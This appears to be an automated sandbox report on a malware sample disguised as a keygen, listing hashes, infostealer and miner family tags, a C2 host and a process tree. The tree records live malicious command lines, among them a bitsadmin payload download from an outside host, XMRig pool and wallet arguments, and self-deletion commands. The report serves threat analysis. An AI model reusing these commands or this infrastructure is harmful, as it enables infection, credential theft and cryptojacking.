Overview

overview

10

Static

static

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ฺฺ

windows10_x64

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows7_x64

10

win102

windows10_x64

10

win104

windows10_x64

10

win105

windows10_x64

10

win106

windows10_x64

10

win103

windows10_x64

10

win101

windows10_x64

10

win100

windows10_x64

10

Resubmissions

24-04-2021 20:28

210424-hdvwe2nvza 10

24-04-2021 19:13

210424-ybjq8yj7ej 10

24-04-2021 19:13

210424-lbec8bsxas 10

24-04-2021 19:13

210424-p1q7nfdl5n 10

24-04-2021 19:13

210424-zsvmftzny6 10

24-04-2021 15:54

210424-bvebvx5d4j 10

24-04-2021 08:51

210424-fycslxztl2 10

24-04-2021 06:48

210424-dpw71r8bwa 10

Analysis

  • max time kernel
    1802s
  • max time network
    1663s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-04-2021 20:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Score
10/10
dcratfickerstealerraccoonredlinexmrigdiscoveryevasioninfostealerminerpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
    evasiontrojan
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

    infostealerfickerstealer
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • XMRig Miner Payload 2 IoCs
    miner
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 54 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • NSIS installer 2 IoCs
    installer
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1908
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1428
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1376
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2576
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1180
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1096
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
              1⤵
              • Drops file in System32 directory
              PID:68
              • C:\Users\Admin\AppData\Roaming\fdjcesa
                C:\Users\Admin\AppData\Roaming\fdjcesa
                2⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:4468
              • C:\Users\Admin\AppData\Roaming\hujcesa
                C:\Users\Admin\AppData\Roaming\hujcesa
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:5644
                • C:\Users\Admin\AppData\Roaming\hujcesa
                  C:\Users\Admin\AppData\Roaming\hujcesa
                  3⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:6124
              • C:\Users\Admin\AppData\Roaming\fdjcesa
                C:\Users\Admin\AppData\Roaming\fdjcesa
                2⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                PID:5992
              • C:\Users\Admin\AppData\Roaming\hujcesa
                C:\Users\Admin\AppData\Roaming\hujcesa
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2552
                • C:\Users\Admin\AppData\Roaming\hujcesa
                  C:\Users\Admin\AppData\Roaming\hujcesa
                  3⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  PID:5096
              • C:\Users\Admin\AppData\Roaming\fdjcesa
                C:\Users\Admin\AppData\Roaming\fdjcesa
                2⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                PID:4064
              • C:\Users\Admin\AppData\Roaming\hujcesa
                C:\Users\Admin\AppData\Roaming\hujcesa
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:2344
                • C:\Users\Admin\AppData\Roaming\hujcesa
                  C:\Users\Admin\AppData\Roaming\hujcesa
                  3⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  PID:4988
              • C:\Windows\system32\rundll32.exe
                C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll",ltJNQrS
                2⤵
                • Windows security modification
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:1624
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2852
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2836
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2756
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2608
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:340
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:800
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3548
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3384
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:196
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3996
                        • C:\Users\Admin\AppData\Local\Temp\is-V72GI.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-V72GI.tmp\Install.tmp" /SL5="$601D6,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:188
                          • C:\Users\Admin\AppData\Local\Temp\is-OKR6V.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-OKR6V.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:636
                            • C:\Program Files\Windows Media Player\WBDRBMRCTJ\ultramediaburner.exe
                              "C:\Program Files\Windows Media Player\WBDRBMRCTJ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3156
                              • C:\Users\Admin\AppData\Local\Temp\is-JDB7K.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-JDB7K.tmp\ultramediaburner.tmp" /SL5="$20200,281924,62464,C:\Program Files\Windows Media Player\WBDRBMRCTJ\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3956
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4108
                            • C:\Users\Admin\AppData\Local\Temp\ce-16034-b2d-ad7ad-4ad45b7ed581c\Maegaebyshory.exe
                              "C:\Users\Admin\AppData\Local\Temp\ce-16034-b2d-ad7ad-4ad45b7ed581c\Maegaebyshory.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3804
                            • C:\Users\Admin\AppData\Local\Temp\50-278c2-cbf-2a4a0-c3b90ecb880a8\Jidaefycixe.exe
                              "C:\Users\Admin\AppData\Local\Temp\50-278c2-cbf-2a4a0-c3b90ecb880a8\Jidaefycixe.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4152
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l1rbl5uu.tdl\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5100
                                • C:\Users\Admin\AppData\Local\Temp\l1rbl5uu.tdl\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\l1rbl5uu.tdl\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4236
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ux300p1v.1o2\google-game.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4884
                                • C:\Users\Admin\AppData\Local\Temp\ux300p1v.1o2\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\ux300p1v.1o2\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:5076
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                    • Loads dropped DLL
                                    PID:3584
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zozqvlwf.qz2\md1_1eaf.exe & exit
                                6⤵
                                  PID:5048
                                  • C:\Users\Admin\AppData\Local\Temp\zozqvlwf.qz2\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\zozqvlwf.qz2\md1_1eaf.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:4908
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdgkhn3d.y5a\y1.exe & exit
                                  6⤵
                                    PID:4596
                                    • C:\Users\Admin\AppData\Local\Temp\gdgkhn3d.y5a\y1.exe
                                      C:\Users\Admin\AppData\Local\Temp\gdgkhn3d.y5a\y1.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4744
                                      • C:\Users\Admin\AppData\Local\Temp\h3sWydohxh.exe
                                        "C:\Users\Admin\AppData\Local\Temp\h3sWydohxh.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:5336
                                        • C:\Users\Admin\AppData\Roaming\1619303616401.exe
                                          "C:\Users\Admin\AppData\Roaming\1619303616401.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619303616401.txt"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:664
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\h3sWydohxh.exe"
                                          9⤵
                                            PID:5216
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 127.0.0.1 -n 3
                                              10⤵
                                              • Runs ping.exe
                                              PID:6060
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\gdgkhn3d.y5a\y1.exe"
                                          8⤵
                                            PID:4440
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /T 10 /NOBREAK
                                              9⤵
                                              • Delays execution with timeout.exe
                                              PID:4484
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qtz5vkib.gp2\askinstall39.exe & exit
                                        6⤵
                                          PID:4324
                                          • C:\Users\Admin\AppData\Local\Temp\qtz5vkib.gp2\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\qtz5vkib.gp2\askinstall39.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4400
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              8⤵
                                                PID:5268
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:5452
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mnzon4a4.yxl\inst.exe & exit
                                            6⤵
                                              PID:3272
                                              • C:\Users\Admin\AppData\Local\Temp\mnzon4a4.yxl\inst.exe
                                                C:\Users\Admin\AppData\Local\Temp\mnzon4a4.yxl\inst.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4308
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gm3otamm.f0f\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:4168
                                                • C:\Users\Admin\AppData\Local\Temp\gm3otamm.f0f\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\gm3otamm.f0f\SunLabsPlayer.exe /S
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  PID:5464
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:6024
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:4352
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                        8⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:6124
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5748
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5456
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:412
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Checks for any installed AV software in registry
                                                              PID:5900
                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                              8⤵
                                                              • Download via BitsAdmin
                                                              PID:4284
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:5440
                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pacW6lxxG1IaGlAt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              PID:5236
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4184
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:4328
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:6112
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:3912
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        9⤵
                                                                          PID:6124
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5580
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          PID:3508
                                                                          • C:\Windows\system32\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                            9⤵
                                                                            • Loads dropped DLL
                                                                            • Drops file in System32 directory
                                                                            • Drops file in Program Files directory
                                                                            PID:1556
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4660
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:2848
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                9⤵
                                                                                  PID:4284
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:6060
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4820
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsq13F8.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5664
                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:4116
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mw21oobp.uqq\GcleanerWW.exe /mixone & exit
                                                                                  6⤵
                                                                                    PID:5364
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5e3wsyri.vkn\toolspab1.exe & exit
                                                                                    6⤵
                                                                                      PID:5632
                                                                                      • C:\Users\Admin\AppData\Local\Temp\5e3wsyri.vkn\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\5e3wsyri.vkn\toolspab1.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5908
                                                                                        • C:\Users\Admin\AppData\Local\Temp\5e3wsyri.vkn\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\5e3wsyri.vkn\toolspab1.exe
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5408
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqlgx5dj.4l1\c7ae36fa.exe & exit
                                                                                      6⤵
                                                                                        PID:5812
                                                                                        • C:\Users\Admin\AppData\Local\Temp\yqlgx5dj.4l1\c7ae36fa.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\yqlgx5dj.4l1\c7ae36fa.exe
                                                                                          7⤵
                                                                                            PID:6124
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pejsmh3j.uwb\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:5976
                                                                                            • C:\Users\Admin\AppData\Local\Temp\pejsmh3j.uwb\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\pejsmh3j.uwb\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4332
                                                                                              • C:\Users\Admin\AppData\Local\Temp\pejsmh3j.uwb\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\pejsmh3j.uwb\app.exe" /8-2222
                                                                                                8⤵
                                                                                                  PID:5308
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4260
                                                                                      • C:\Users\Admin\AppData\Roaming\D528.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\D528.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4144
                                                                                        • C:\Users\Admin\AppData\Roaming\D528.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\D528.tmp.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          PID:344
                                                                                      • C:\Users\Admin\AppData\Roaming\D78A.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\D78A.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4124
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w28153@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:192
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w24590 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:4268
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                            PID:4228
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping 127.0.0.1
                                                                                              4⤵
                                                                                              • Runs ping.exe
                                                                                              PID:1928
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
